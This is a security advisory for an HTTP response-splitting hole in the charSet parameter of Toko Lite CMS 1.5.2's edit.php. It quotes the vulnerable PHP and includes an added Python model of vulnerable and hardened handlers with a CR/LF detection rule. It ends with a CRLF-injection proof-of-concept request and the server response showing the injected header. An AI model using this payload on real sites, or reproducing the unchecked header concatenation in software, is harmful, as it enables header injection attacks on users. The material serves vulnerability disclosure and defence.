Toko Lite CMS 1.5.2 – ‘edit.php’ HTTP Response Splitting

  • Author: LiquidWorm
    Date: 2011-09-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17859/
  • Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability
    
    
    Vendor: Toko
    Product web page: http://toko-contenteditor.pageil.net
    Affected version: 1.5.2
    
    Summary: Toko Web Content Editor CMS is a compact, multi-language, open
    source web editor and content management system (CMS). It is an advanced,
    easy-to-use yet fully featured program that can be integrated with any
    existing site. It takes 2 minutes to install, even for non-technical users.
    
    Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly
    sanitised before being placed in the Content-Type response header. This can be
    exploited to inject arbitrary HTTP headers, which are then included in the
    response sent to the user.
    
    
    ====================================================================
    /edit.php (lines 3-16):
    --------------------------------------------------------------------
    
    $charSet = "iso-8859-1";
    $dir = "ltr";
    
    if ( isset( $_POST[ "charSet" ] ) )
    {
        $charSet = $_POST[ "charSet" ];
    
        if ( $charSet == "windows-1255" )
        {
            $dir = "rtl";
        }
    }
    
    header( "Content-Type: text/html; charset=" . $charSet );
    
    ====================================================================
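    The following is an added example, not code from the ZSL-2011-5048 advisory or
    from Toko Lite. It models the charSet handling of edit.php in Python: the
    original handler concatenates the POSTed value straight into the Content-Type
    header, while a hardened handler only accepts a known charset label (the
    allowlist, the helper names and the detection rule are assumptions). The
    constructed request body is the advisory's own PoC payload; note that it
    starts with CR LF SP, the obsolete header line-folding form, and the advisory's
    response shows that it is still emitted as its own header line. Rejecting any
    CR or LF, as the hardened path does by construction, covers that variant too.

```python
"""
Added example, not code from the ZSL-2011-5048 advisory or from Toko Lite.
Models the charSet handling of edit.php: the vulnerable path concatenates
client input into the Content-Type header, the hardened path allowlists it.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs

# Constructed input: the URL-encoded body from the advisory's PoC request.
POC_BODY = "charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection"

DEFAULT_CHARSET = "iso-8859-1"
# Assumed allowlist (the page itself only names iso-8859-1 and windows-1255).
ALLOWED_CHARSETS = {"iso-8859-1", "utf-8", "windows-1255"}


def charset_from_body(body: str) -> Optional[str]:
    """Mimic $_POST['charSet']: decode the form body, return the value or None."""
    values = parse_qs(body, keep_blank_values=True).get("charSet")
    return values[0] if values else None


def vulnerable_content_type(body: str) -> str:
    """Original behaviour of edit.php: client input is concatenated unchecked."""
    charset = charset_from_body(body)
    if charset is None:
        charset = DEFAULT_CHARSET
    return "Content-Type: text/html; charset=" + charset


def hardened_content_type(body: str) -> str:
    """Fixed behaviour: unknown or malformed labels fall back to the default.
    The allowlist entries contain no CR/LF, so no client value can ever start
    a new header line, folded or not."""
    charset = charset_from_body(body)
    if charset is None or charset.lower() not in ALLOWED_CHARSETS:
        charset = DEFAULT_CHARSET
    return "Content-Type: text/html; charset=" + charset.lower()


def header_lines(header_block: str) -> List[str]:
    """Split a header block on CRLF (or bare LF), as an HTTP client does."""
    return re.split(r"\r?\n", header_block)


def looks_like_header_injection(body: str) -> bool:
    """Detection rule for request logs or a WAF: a charset label must never
    carry CR or LF, so any such byte in the decoded charSet value is flagged."""
    value = charset_from_body(body) or ""
    return re.search(r"[\r\n]", value) is not None


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_content_type),
                     ("hardened", hardened_content_type)):
        print(name, header_lines(fn(POC_BODY)))
    print("flagged:", looks_like_header_injection(POC_BODY))
```

    Run stand-alone, the vulnerable path yields two header lines from the one
    header() call, which is exactly what the advisory's captured response shows;
    the hardened path yields the default charset. Where an allowlist is too
    restrictive, a syntactic check that permits only charset token characters
    (letters, digits, '-', '_', '.', ':') achieves the same goal of keeping CR and
    LF out of the header value.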
    
    
    Tested on: Microsoft Windows XP Professional SP3 (EN)
               Apache 2.2.14 (Win32)
               PHP 5.3.1
               MySQL 5.1.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2011-5048
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
    
    CWE ID: 113
    
    
    22.03.2011
    
    
    ------------
    
    
    POST /tokolite1.5.2/edit.php HTTP/1.1
    Content-Length: 55
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25
    Host: localhost:80
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    
    charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
    
    --
    
    HTTP/1.1 302 Found
    Date: Tue, 22 Mar 2011 03:57:30 GMT
    Server: Apache/2.2.14 (Win32)
    X-Powered-By: PHP/5.3.1
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: Login.php
    Content-Length: 0
    Keep-Alive: timeout=5, max=64
    Connection: Keep-Alive
    Content-Type: text/html; charset=
    ZSL-Custom-Header: love_injection